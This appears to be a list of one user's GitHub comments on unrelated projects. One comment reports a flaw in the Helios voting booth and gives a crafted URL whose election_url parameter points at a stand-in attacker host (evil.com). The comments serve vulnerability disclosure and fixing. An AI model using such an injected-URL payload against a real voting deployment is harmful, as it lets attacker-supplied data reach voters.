redfast00

Results 94 comments of redfast00

A quick idea: if the instruction cell is 255, we look to the next cell and add that number to 255 and then call the syscall with the sum. We'll...

We hacked some more on it yesterday night, and managed to work around it by putting the binary and all libraries it needs into an AppImage. It's pretty bloated (it...

I read the paper; the version that is deployed still seems to be vulnerable: `https://vote.heliosvoting.org/booth/vote.html?election_url=http://evil.com/get-bad-data` makes requests to `evil.com`.

@benadida ^ is this something you would accept a PR for? Is it okay to just block external URLs?

In particular, line 370 of `heliosbooth/vote.html` still uses `$.getJSON`, so that might still be vulnerable to XSS.

The XSS with `getJSON` seems to have been fixed (I can't reproduce it).

So I just pipe hashcat to hashcat then? (trying to avoid too small workloads)

@pazDontExist: could you please be a bit more specific? How would you make it so it floats above the footer?

SSTap is Windows-only I think, but this did give me the idea to look for software that translates SOCKS to TUN. There is [tun2socks](https://github.com/ambrop72/badvpn) I could use that might work....

I'm on `CC: Tweaked 1.80pr1.5` and `plethora 1.1.11`.